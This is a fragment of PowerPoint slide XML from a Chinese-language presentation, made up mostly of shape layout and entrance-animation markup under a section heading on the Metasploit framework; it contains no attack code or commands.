          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
